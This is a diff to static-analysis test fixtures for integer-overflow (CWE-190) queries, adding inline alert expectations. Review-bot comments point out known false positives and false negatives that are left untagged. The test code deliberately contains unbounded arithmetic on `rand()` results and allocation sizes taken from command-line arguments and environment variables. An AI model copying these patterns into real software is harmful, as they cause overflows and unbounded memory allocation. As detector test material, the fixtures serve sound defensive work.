test.cpp:204:7:204:7 | y | This arithmetic expression depends on an $@, potentially causing an overflow. 
| test.cpp:190:10:190:13 | call to rand | uncontrolled value | -| test.cpp:205:7:205:7 | y | test.cpp:190:10:190:13 | call to rand | test.cpp:205:7:205:7 | y | This arithmetic expression depends on an $@, potentially causing an overflow. | test.cpp:190:10:190:13 | call to rand | uncontrolled value | -| test.cpp:208:7:208:7 | y | test.cpp:190:10:190:13 | call to rand | test.cpp:208:7:208:7 | y | This arithmetic expression depends on an $@, potentially causing an overflow. | test.cpp:190:10:190:13 | call to rand | uncontrolled value | -| test.cpp:219:8:219:8 | x | test.cpp:215:11:215:14 | call to rand | test.cpp:219:8:219:8 | x | This arithmetic expression depends on an $@, potentially causing an overflow. | test.cpp:215:11:215:14 | call to rand | uncontrolled value | diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/ArithmeticUncontrolled/ArithmeticUncontrolled.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/ArithmeticUncontrolled/ArithmeticUncontrolled.qlref index 1fcafc3ca1c8..e18d0e08a87f 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/ArithmeticUncontrolled/ArithmeticUncontrolled.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/ArithmeticUncontrolled/ArithmeticUncontrolled.qlref @@ -1 +1,2 @@ -Security/CWE/CWE-190/ArithmeticUncontrolled.ql +query: Security/CWE/CWE-190/ArithmeticUncontrolled.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/ArithmeticUncontrolled/test.c b/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/ArithmeticUncontrolled/test.c index 691801a620a5..77c4ace01e75 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/ArithmeticUncontrolled/test.c +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/ArithmeticUncontrolled/test.c 
@@ -15,10 +15,10 @@ void add_100(int); void randomTester() { int i; for (i = 0; i < 1000; i++) { - int r = rand(); + int r = rand(); // $ Source // BAD: The return from rand() is unbounded - trySlice(r, r+100); + trySlice(r, r+100); // $ Alert } for (i = 0; i < 1000; i++) { @@ -31,8 +31,8 @@ void randomTester() { } { - int r = RAND(); - r += 100; // BAD: The return from RAND() is unbounded + int r = RAND(); // $ Source + r += 100; // BAD: The return from RAND() is unbounded // $ Alert } { @@ -41,8 +41,8 @@ void randomTester() { } { - int r = rand(); - r += 100; // BAD + int r = rand(); // $ Source + r += 100; // BAD // $ Alert } { @@ -72,15 +72,15 @@ void randomTester() { } { - int r = RAND2(); + int r = RAND2(); // $ Source - r = r + 100; // BAD + r = r + 100; // BAD // $ Alert } { - int r = (rand() ^ rand()); + int r = (rand() ^ rand()); // $ Source - r = r + 100; // BAD + r = r + 100; // BAD // $ Alert } { @@ -122,21 +122,21 @@ void randomTester2(int bound, int min, int max) { void moreTests() { { - int r = rand(); + int r = rand(); // $ Source - r = r * 100; // BAD + r = r * 100; // BAD // $ Alert } { - int r = rand(); + int r = rand(); // $ Source - r *= 100; // BAD + r *= 100; // BAD // $ Alert } { - int r = rand(); + int r = rand(); // $ Source int v = 100; - v *= r; // BAD + v *= r; // BAD // $ Alert } { @@ -152,9 +152,9 @@ void moreTests() { } { - unsigned int r = rand(); + unsigned int r = rand(); // $ Source - r = r - 100; // BAD + r = r - 100; // BAD // $ Alert } } diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/ArithmeticUncontrolled/test.cpp b/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/ArithmeticUncontrolled/test.cpp index f5e401c60cde..58f37f152cfd 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/ArithmeticUncontrolled/test.cpp +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/ArithmeticUncontrolled/test.cpp 
@@ -5,36 +5,36 @@ int rand(void); int get_rand() { - return rand(); + return rand(); // $ Source } void get_rand2(int *dest) { - *dest = rand(); + *dest = rand(); // $ Source } void get_rand3(int &dest) { - dest = rand(); + dest = rand(); // $ Source } void randomTester2() { { int r = get_rand(); - r = r + 100; // BAD + r = r + 100; // BAD // $ Alert } { int r; get_rand2(&r); - r = r + 100; // BAD + r = r + 100; // BAD // $ Alert } { int r; get_rand3(r); - r = r + 100; // BAD + r = r + 100; // BAD // $ Alert } } @@ -59,10 +59,10 @@ int test_remainder_subtract() unsigned int test_remainder_subtract_unsigned() { - unsigned int x = rand(); + unsigned int x = rand(); // $ Source unsigned int y = x % 100; // y <= x - return x - y; // GOOD (as y <= x) [FALSE POSITIVE] + return x - y; // GOOD (as y <= x) [FALSE POSITIVE] // $ Alert } typedef unsigned long size_t; @@ -83,11 +83,11 @@ int test_snprintf(char *buf, size_t buf_sz) int test_else_1() { - int x = rand(); + int x = rand(); // $ Source if (x > 100) { - return x * 10; // BAD + return x * 10; // BAD // $ Alert } else { return x * 10; // GOOD (as x <= 100) } @@ -95,11 +95,11 @@ int test_else_1() int test_else_2() { - int x = rand(); + int x = rand(); // $ Source if (x > 100) { - return x * 10; // BAD + return x * 10; // BAD // $ Alert } return x * 10; // GOOD (as x <= 100) @@ -134,7 +134,7 @@ int test_conditional_assignment_2() int test_conditional_assignment_3() { - int x = rand(); + int x = rand(); // $ Source int y = 100; int c = 10; @@ -143,15 +143,15 @@ int test_conditional_assignment_3() y = x; } - return y * c; // GOOD (as y <= 100) [FALSE POSITIVE] + return y * c; // GOOD (as y <= 100) [FALSE POSITIVE] // $ Alert } int test_underflow() { - int x = rand(); + int x = rand(); // $ Source int a = -x; // GOOD int b = 10 - x; // GOOD - int c = b * 2; // BAD + int c = b * 2; // BAD // $ Alert } int test_cast() 
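Review bot: The results that the test comments themselves label `[FALSE POSITIVE]` are tagged as ordinary expected alerts, starting with `return x - y;` in `test_remainder_subtract_unsigned` (hunk `@@ -59,10 +59,10 @@`); the same applies to `return y * c;` in `test_conditional_assignment_3` and to the two `[FALSE POSITIVE]` lines in `test_if_const_bounded` in the later hunks of this file. The inline-expectations format has a `SPURIOUS:` prefix for this case, so the line would read `return x - y; // GOOD (as y <= x) [FALSE POSITIVE] // $ SPURIOUS: Alert`. With a plain `Alert`, the machine-checked expectation records an alert on a bounded subtraction as intended behaviour, and only the free-text comment still says it is a known precision gap. Several of these functions begin or end outside their hunks.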
@@ -166,9 +166,9 @@ int test_cast() void test_float() { { - int x = rand(); + int x = rand(); // $ Source float y = x; // GOOD - int z = (int)y * 5; // BAD + int z = (int)y * 5; // BAD // $ Alert } { @@ -186,37 +186,37 @@ void test_float() void test_if_const_bounded() { - int x = rand(); - int y = rand(); + int x = rand(); // $ Source + int y = rand(); // $ Source int c = 10; if (x < 1000) { x = x * 2; // GOOD - x = x * c; // GOOD [FALSE POSITIVE] + x = x * c; // GOOD [FALSE POSITIVE] // $ Alert } else { - x = x * 2; // BAD - x = x * c; // BAD + x = x * 2; // BAD // $ Alert + x = x * c; // BAD // $ Alert } if (y > 1000) { - y = y * 2; // BAD - y = y * c; // BAD + y = y * 2; // BAD // $ Alert + y = y * c; // BAD // $ Alert } else { y = y * 2; // GOOD - y = y * c; // GOOD [FALSE POSITIVE] + y = y * c; // GOOD [FALSE POSITIVE] // $ Alert } } void test_mod_limit() { { - int x = rand(); + int x = rand(); // $ Source int y = 100; int z; - z = (x + y) % 1000; // BAD + z = (x + y) % 1000; // BAD // $ Alert } { diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/ArithmeticWithExtremeValues/ArithmeticWithExtremeValues.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/ArithmeticWithExtremeValues/ArithmeticWithExtremeValues.qlref index ab2c35ce59b2..0109cee57cf7 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/ArithmeticWithExtremeValues/ArithmeticWithExtremeValues.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/ArithmeticWithExtremeValues/ArithmeticWithExtremeValues.qlref @@ -1 +1,2 @@ -Security/CWE/CWE-190/ArithmeticWithExtremeValues.ql +query: Security/CWE/CWE-190/ArithmeticWithExtremeValues.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/ArithmeticWithExtremeValues/test.c b/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/ArithmeticWithExtremeValues/test.c index 8760641c8e2d..d4fa29deaf97 100644 
--- a/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/ArithmeticWithExtremeValues/test.c +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/ArithmeticWithExtremeValues/test.c @@ -14,7 +14,7 @@ int len_last(int n, char** lines) { } // BAD: if the input array is empty, then max will still be INT_MAX - return min + 1; + return min + 1; // $ Alert } @@ -45,9 +45,9 @@ void test_crement() { sc1 = CHAR_MIN; sc1++; // GOOD sc2 = CHAR_MIN; - sc2--; // BAD + sc2--; // BAD // $ Alert sc3 = CHAR_MAX; - sc3++; // BAD + sc3++; // BAD // $ Alert sc4 = CHAR_MAX; sc4--; // GOOD @@ -56,11 +56,11 @@ void test_crement() { sc5++; // GOOD [FALSE POSITIVE] sc6 = CHAR_MAX; - sc6 += 1; // BAD + sc6 += 1; // BAD // $ Alert sc7 = CHAR_MAX; sc7 -= 1; // GOOD sc8 = CHAR_MIN; - sc8 -= 1; // BAD + sc8 -= 1; // BAD // $ Alert sc9 = CHAR_MIN; sc9 += 1; // GOOD @@ -121,5 +121,5 @@ void test_guards4(int cond) { if (x == 0) return; - return x + 1; // BAD + return x + 1; // BAD // $ Alert } diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/ComparisonWithWiderType/ComparisonWithWiderType.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/ComparisonWithWiderType/ComparisonWithWiderType.qlref index 4a71f8aad4ca..f836a00c9c4e 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/ComparisonWithWiderType/ComparisonWithWiderType.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/ComparisonWithWiderType/ComparisonWithWiderType.qlref @@ -1 +1,2 @@ -Security/CWE/CWE-190/ComparisonWithWiderType.ql +query: Security/CWE/CWE-190/ComparisonWithWiderType.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/ComparisonWithWiderType/test.c b/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/ComparisonWithWiderType/test.c index 8361ae3e31b5..e22cce3c2a1d 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/ComparisonWithWiderType/test.c 
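Review bot: In `test_crement` (hunk `@@ -56,11 +56,11 @@`) the context line `sc5++; // GOOD [FALSE POSITIVE]` is left without an expectation tag, while every neighbouring flagged line gains `// $ Alert`. If the query still reports that line, it should carry `// $ SPURIOUS: Alert` so the known false positive is recorded inline. If it no longer does, the `[FALSE POSITIVE]` remark is stale and should be dropped. Which case holds cannot be told from this hunk, because the matching `.expected` file is not shown here. `test_crement` starts and ends outside the hunk.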
+++ b/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/ComparisonWithWiderType/test.c @@ -1,17 +1,17 @@ void test1 (int x) { char c; - for (c = 0; c < x; c++) {} //BAD + for (c = 0; c < x; c++) {} //BAD // $ Alert } void test2 (int x) { char c; - for (c = 0; x > c; c++) {} // BAD + for (c = 0; x > c; c++) {} // BAD // $ Alert } void test3 (int x) { short s; - for (s = 0; s < x; s++) {} //BAD + for (s = 0; s < x; s++) {} //BAD // $ Alert } void runner() { // get range analysis to give large values to x in tests @@ -39,7 +39,7 @@ void test5 () { void test6() { short s1; - for (s1 = 0; s1 < 0x0000ffff; s1++) {} // BAD + for (s1 = 0; s1 < 0x0000ffff; s1++) {} // BAD // $ Alert } void test7(long long l) { @@ -62,7 +62,7 @@ void test9(int x) { void test10(int x) { short s; - for (s = 0; s < x; ) { // BAD + for (s = 0; s < x; ) { // BAD // $ Alert do { s++; 
@@ -84,27 +84,27 @@ void test12() { unsigned int x; x = get_a_uint(); - for (c = 0; c < x; c++) {} // BAD + for (c = 0; c < x; c++) {} // BAD // $ Alert x = get_a_uint(); for (c = 0; c < 0xFF; c++) {} // GOOD x = get_a_uint(); - for (c = 0; c < 0xFF00; c++) {} // BAD + for (c = 0; c < 0xFF00; c++) {} // BAD // $ Alert x = get_a_uint(); - for (c = 0; c < 0xFF0000; c++) {} // BAD + for (c = 0; c < 0xFF0000; c++) {} // BAD // $ Alert x = get_a_uint(); - for (c = 0; c < 0xFF000000; c++) {} // BAD + for (c = 0; c < 0xFF000000; c++) {} // BAD // $ Alert x = get_a_uint(); for (c = 0; c < (x & 0xFF); c++) {} // GOOD x = get_a_uint(); - for (c = 0; c < (x & 0xFF00); c++) {} // BAD + for (c = 0; c < (x & 0xFF00); c++) {} // BAD // $ Alert x = get_a_uint(); - for (c = 0; c < (x & 0xFF0000); c++) {} // BAD + for (c = 0; c < (x & 0xFF0000); c++) {} // BAD // $ Alert x = get_a_uint(); - for (c = 0; c < (x & 0xFF000000); c++) {} // BAD + for (c = 0; c < (x & 0xFF000000); c++) {} // BAD // $ Alert x = get_a_uint(); - for (c = 0; c < (x >> 8); c++) {} // BAD + for (c = 0; c < (x >> 8); c++) {} // BAD // $ Alert x = get_a_uint(); - for (c = 0; c < (x >> 16); c++) {} // BAD + for (c = 0; c < (x >> 16); c++) {} // BAD // $ Alert x = get_a_uint(); for (c = 0; c < (x >> 24); c++) {} // GOOD (assuming 32-bit ints) x = get_a_uint(); @@ -125,7 +125,7 @@ void test13() { ux = get_a_uint(); uy = get_a_uint(); sz = ux & uy; - for (uc = 0; uc < sz; uc++) {} // BAD + for (uc = 0; uc < sz; uc++) {} // BAD // $ Alert ux = get_a_uint(); uy = get_a_uint(); @@ -136,7 +136,7 @@ void test13() { sx = get_an_int(); sy = get_an_int(); sz = (unsigned)sx & (unsigned)sy; - for (uc = 0; uc < sz; uc++) {} // BAD + for (uc = 0; uc < sz; uc++) {} // BAD // $ Alert sx = get_an_int(); sy = get_an_int(); 
@@ -153,7 +153,7 @@ void test14() { // BAD: 's' is compared with a value of a wider type. // 's' overflows before reaching 'sx', // causing an infinite loop - while (s < sx) { + while (s < sx) { // $ Alert s += 1; } diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/TaintedAllocationSize/TaintedAllocationSize.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/TaintedAllocationSize/TaintedAllocationSize.expected index 4235033abccc..e321000d0caa 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/TaintedAllocationSize/TaintedAllocationSize.expected +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/TaintedAllocationSize/TaintedAllocationSize.expected 
@@ -1,3 +1,24 @@ +#select +| test.cpp:43:31:43:36 | call to malloc | test.cpp:39:27:39:30 | **argv | test.cpp:43:38:43:44 | tainted | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. | test.cpp:39:27:39:30 | **argv | user input (a command-line argument) | +| test.cpp:44:31:44:36 | call to malloc | test.cpp:39:27:39:30 | **argv | test.cpp:44:38:44:63 | ... * ... | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. | test.cpp:39:27:39:30 | **argv | user input (a command-line argument) | +| test.cpp:46:31:46:36 | call to malloc | test.cpp:39:27:39:30 | **argv | test.cpp:46:38:46:63 | ... + ... | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. | test.cpp:39:27:39:30 | **argv | user input (a command-line argument) | +| test.cpp:49:25:49:30 | call to malloc | test.cpp:39:27:39:30 | **argv | test.cpp:49:32:49:35 | size | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. | test.cpp:39:27:39:30 | **argv | user input (a command-line argument) | +| test.cpp:50:17:50:30 | new[] | test.cpp:39:27:39:30 | **argv | test.cpp:50:17:50:30 | size | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. | test.cpp:39:27:39:30 | **argv | user input (a command-line argument) | +| test.cpp:53:21:53:27 | call to realloc | test.cpp:39:27:39:30 | **argv | test.cpp:53:35:53:60 | ... * ... | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. | test.cpp:39:27:39:30 | **argv | user input (a command-line argument) | +| test.cpp:128:17:128:22 | call to malloc | test.cpp:124:18:124:31 | *call to getenv | test.cpp:128:24:128:41 | ... * ... | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. 
| test.cpp:124:18:124:31 | *call to getenv | user input (an environment variable) | +| test.cpp:135:3:135:8 | call to malloc | test.cpp:133:19:133:32 | *call to getenv | test.cpp:135:10:135:27 | ... * ... | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. | test.cpp:133:19:133:32 | *call to getenv | user input (an environment variable) | +| test.cpp:152:4:152:9 | call to malloc | test.cpp:148:20:148:33 | *call to getenv | test.cpp:152:11:152:28 | ... * ... | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. | test.cpp:148:20:148:33 | *call to getenv | user input (an environment variable) | +| test.cpp:194:4:194:9 | call to malloc | test.cpp:190:19:190:32 | *call to getenv | test.cpp:194:11:194:28 | ... * ... | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. | test.cpp:190:19:190:32 | *call to getenv | user input (an environment variable) | +| test.cpp:209:4:209:9 | call to malloc | test.cpp:205:19:205:32 | *call to getenv | test.cpp:209:11:209:28 | ... * ... | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. | test.cpp:205:19:205:32 | *call to getenv | user input (an environment variable) | +| test.cpp:261:14:261:19 | call to malloc | test.cpp:267:24:267:37 | *call to getenv | test.cpp:261:21:261:21 | s | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. | test.cpp:267:24:267:37 | *call to getenv | user input (an environment variable) | +| test.cpp:269:2:269:7 | call to malloc | test.cpp:267:24:267:37 | *call to getenv | test.cpp:269:9:269:18 | local_size | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. 
| test.cpp:267:24:267:37 | *call to getenv | user input (an environment variable) | +| test.cpp:271:2:271:7 | call to malloc | test.cpp:241:14:241:27 | *call to getenv | test.cpp:271:9:271:24 | call to get_tainted_size | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. | test.cpp:241:14:241:27 | *call to getenv | user input (an environment variable) | +| test.cpp:275:2:275:9 | call to my_alloc | test.cpp:267:24:267:37 | *call to getenv | test.cpp:275:11:275:20 | local_size | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. | test.cpp:267:24:267:37 | *call to getenv | user input (an environment variable) | +| test.cpp:293:4:293:9 | call to malloc | test.cpp:289:20:289:33 | *call to getenv | test.cpp:293:11:293:29 | ... * ... | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. | test.cpp:289:20:289:33 | *call to getenv | user input (an environment variable) | +| test.cpp:321:4:321:9 | call to malloc | test.cpp:281:18:281:31 | *call to getenv | test.cpp:321:11:321:28 | ... * ... | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. | test.cpp:281:18:281:31 | *call to getenv | user input (an environment variable) | +| test.cpp:338:3:338:8 | call to malloc | test.cpp:281:18:281:31 | *call to getenv | test.cpp:338:10:338:27 | ... * ... | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. | test.cpp:281:18:281:31 | *call to getenv | user input (an environment variable) | +| test.cpp:385:25:385:33 | call to MyMalloc1 | test.cpp:383:18:383:31 | *call to getenv | test.cpp:385:35:385:38 | size | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. 
| test.cpp:383:18:383:31 | *call to getenv | user input (an environment variable) | +| test.cpp:386:25:386:33 | call to MyMalloc2 | test.cpp:383:18:383:31 | *call to getenv | test.cpp:386:35:386:38 | size | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. | test.cpp:383:18:383:31 | *call to getenv | user input (an environment variable) | edges | test.cpp:39:27:39:30 | **argv | test.cpp:40:16:40:19 | call to atoi | provenance | TaintFunction | | test.cpp:40:16:40:19 | call to atoi | test.cpp:43:38:43:44 | tainted | provenance | | 
@@ -88,24 +109,3 @@ nodes | test.cpp:385:35:385:38 | size | semmle.label | size | | test.cpp:386:35:386:38 | size | semmle.label | size | subpaths -#select -| test.cpp:43:31:43:36 | call to malloc | test.cpp:39:27:39:30 | **argv | test.cpp:43:38:43:44 | tainted | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. | test.cpp:39:27:39:30 | **argv | user input (a command-line argument) | -| test.cpp:44:31:44:36 | call to malloc | test.cpp:39:27:39:30 | **argv | test.cpp:44:38:44:63 | ... * ... | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. | test.cpp:39:27:39:30 | **argv | user input (a command-line argument) | -| test.cpp:46:31:46:36 | call to malloc | test.cpp:39:27:39:30 | **argv | test.cpp:46:38:46:63 | ... + ... | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. | test.cpp:39:27:39:30 | **argv | user input (a command-line argument) | -| test.cpp:49:25:49:30 | call to malloc | test.cpp:39:27:39:30 | **argv | test.cpp:49:32:49:35 | size | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. | test.cpp:39:27:39:30 | **argv | user input (a command-line argument) | -| test.cpp:50:17:50:30 | new[] | test.cpp:39:27:39:30 | **argv | test.cpp:50:17:50:30 | size | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. | test.cpp:39:27:39:30 | **argv | user input (a command-line argument) | -| test.cpp:53:21:53:27 | call to realloc | test.cpp:39:27:39:30 | **argv | test.cpp:53:35:53:60 | ... * ... | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. | test.cpp:39:27:39:30 | **argv | user input (a command-line argument) | -| test.cpp:128:17:128:22 | call to malloc | test.cpp:124:18:124:31 | *call to getenv | test.cpp:128:24:128:41 | ... * ... | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. 
| test.cpp:124:18:124:31 | *call to getenv | user input (an environment variable) | -| test.cpp:135:3:135:8 | call to malloc | test.cpp:133:19:133:32 | *call to getenv | test.cpp:135:10:135:27 | ... * ... | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. | test.cpp:133:19:133:32 | *call to getenv | user input (an environment variable) | -| test.cpp:152:4:152:9 | call to malloc | test.cpp:148:20:148:33 | *call to getenv | test.cpp:152:11:152:28 | ... * ... | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. | test.cpp:148:20:148:33 | *call to getenv | user input (an environment variable) | -| test.cpp:194:4:194:9 | call to malloc | test.cpp:190:19:190:32 | *call to getenv | test.cpp:194:11:194:28 | ... * ... | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. | test.cpp:190:19:190:32 | *call to getenv | user input (an environment variable) | -| test.cpp:209:4:209:9 | call to malloc | test.cpp:205:19:205:32 | *call to getenv | test.cpp:209:11:209:28 | ... * ... | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. | test.cpp:205:19:205:32 | *call to getenv | user input (an environment variable) | -| test.cpp:261:14:261:19 | call to malloc | test.cpp:267:24:267:37 | *call to getenv | test.cpp:261:21:261:21 | s | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. | test.cpp:267:24:267:37 | *call to getenv | user input (an environment variable) | -| test.cpp:269:2:269:7 | call to malloc | test.cpp:267:24:267:37 | *call to getenv | test.cpp:269:9:269:18 | local_size | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. 
| test.cpp:267:24:267:37 | *call to getenv | user input (an environment variable) | -| test.cpp:271:2:271:7 | call to malloc | test.cpp:241:14:241:27 | *call to getenv | test.cpp:271:9:271:24 | call to get_tainted_size | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. | test.cpp:241:14:241:27 | *call to getenv | user input (an environment variable) | -| test.cpp:275:2:275:9 | call to my_alloc | test.cpp:267:24:267:37 | *call to getenv | test.cpp:275:11:275:20 | local_size | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. | test.cpp:267:24:267:37 | *call to getenv | user input (an environment variable) | -| test.cpp:293:4:293:9 | call to malloc | test.cpp:289:20:289:33 | *call to getenv | test.cpp:293:11:293:29 | ... * ... | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. | test.cpp:289:20:289:33 | *call to getenv | user input (an environment variable) | -| test.cpp:321:4:321:9 | call to malloc | test.cpp:281:18:281:31 | *call to getenv | test.cpp:321:11:321:28 | ... * ... | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. | test.cpp:281:18:281:31 | *call to getenv | user input (an environment variable) | -| test.cpp:338:3:338:8 | call to malloc | test.cpp:281:18:281:31 | *call to getenv | test.cpp:338:10:338:27 | ... * ... | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. | test.cpp:281:18:281:31 | *call to getenv | user input (an environment variable) | -| test.cpp:385:25:385:33 | call to MyMalloc1 | test.cpp:383:18:383:31 | *call to getenv | test.cpp:385:35:385:38 | size | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. 
| test.cpp:383:18:383:31 | *call to getenv | user input (an environment variable) | -| test.cpp:386:25:386:33 | call to MyMalloc2 | test.cpp:383:18:383:31 | *call to getenv | test.cpp:386:35:386:38 | size | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. | test.cpp:383:18:383:31 | *call to getenv | user input (an environment variable) | diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/TaintedAllocationSize/TaintedAllocationSize.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/TaintedAllocationSize/TaintedAllocationSize.qlref index df804c0942f4..2db07b995892 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/TaintedAllocationSize/TaintedAllocationSize.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/TaintedAllocationSize/TaintedAllocationSize.qlref @@ -1 +1,2 @@ -Security/CWE/CWE-190/TaintedAllocationSize.ql +query: Security/CWE/CWE-190/TaintedAllocationSize.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/TaintedAllocationSize/test.cpp b/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/TaintedAllocationSize/test.cpp index e13c50a960b4..dfdebcf2478a 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/TaintedAllocationSize/test.cpp +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/TaintedAllocationSize/test.cpp 
@@ -36,21 +36,21 @@ int getTainted() { return i; } -int main(int argc, char **argv) { +int main(int argc, char **argv) { // $ Source int tainted = atoi(argv[1]); MyStruct *arr1 = (MyStruct *)malloc(sizeof(MyStruct)); // GOOD - MyStruct *arr2 = (MyStruct *)malloc(tainted); // BAD - MyStruct *arr3 = (MyStruct *)malloc(tainted * sizeof(MyStruct)); // BAD + MyStruct *arr2 = (MyStruct *)malloc(tainted); // BAD // $ Alert + MyStruct *arr3 = (MyStruct *)malloc(tainted * sizeof(MyStruct)); // BAD // $ Alert MyStruct *arr4 = (MyStruct *)malloc(getTainted() * sizeof(MyStruct)); // BAD [NOT DETECTED] - MyStruct *arr5 = (MyStruct *)malloc(sizeof(MyStruct) + tainted); // BAD + MyStruct *arr5 = (MyStruct *)malloc(sizeof(MyStruct) + tainted); // BAD // $ Alert int size = tainted * 8; - char *chars1 = (char *)malloc(size); // BAD - char *chars2 = new char[size]; // BAD + char *chars1 = (char *)malloc(size); // BAD // $ Alert + char *chars2 = new char[size]; // BAD // $ Alert char *chars3 = new char[8]; // GOOD - arr1 = (MyStruct *)realloc(arr1, sizeof(MyStruct) * tainted); // BAD + arr1 = (MyStruct *)realloc(arr1, sizeof(MyStruct) * tainted); // BAD // $ Alert size = 8; chars3 = new char[size]; // GOOD @@ -121,18 +121,18 @@ int bounded(int x, int limit) { } void open_file_bounded () { - int size = atoi(getenv("USER")); + int size = atoi(getenv("USER")); // $ Source int bounded_size = bounded(size, MAX_SIZE); int* a = (int*)malloc(bounded_size * sizeof(int)); // GOOD - int* b = (int*)malloc(size * sizeof(int)); // BAD + int* b = (int*)malloc(size * sizeof(int)); // BAD // $ Alert } void more_bounded_tests() { { - int size = atoi(getenv("USER")); + int size = atoi(getenv("USER")); // $ Source - malloc(size * sizeof(int)); // BAD + malloc(size * sizeof(int)); // BAD // $ Alert } { 
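Review bot: The `arr4` line in `main` (hunk `@@ -36,21`) keeps its `// BAD [NOT DETECTED]` comment but gets no inline expectation, so the known false negative for `malloc(getTainted() * sizeof(MyStruct))` is not visible to the InlineExpectations postprocess that this commit adds to the `.qlref`. Writing it as `// BAD [NOT DETECTED] // $ MISSING: Alert` would make the test fail, and prompt an annotation update, once the query starts reporting that allocation. A user-controlled allocation size is the case this query exists for, so the gap is worth tracking in the test itself rather than only in a prose comment. main's body runs past the end of the hunk.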
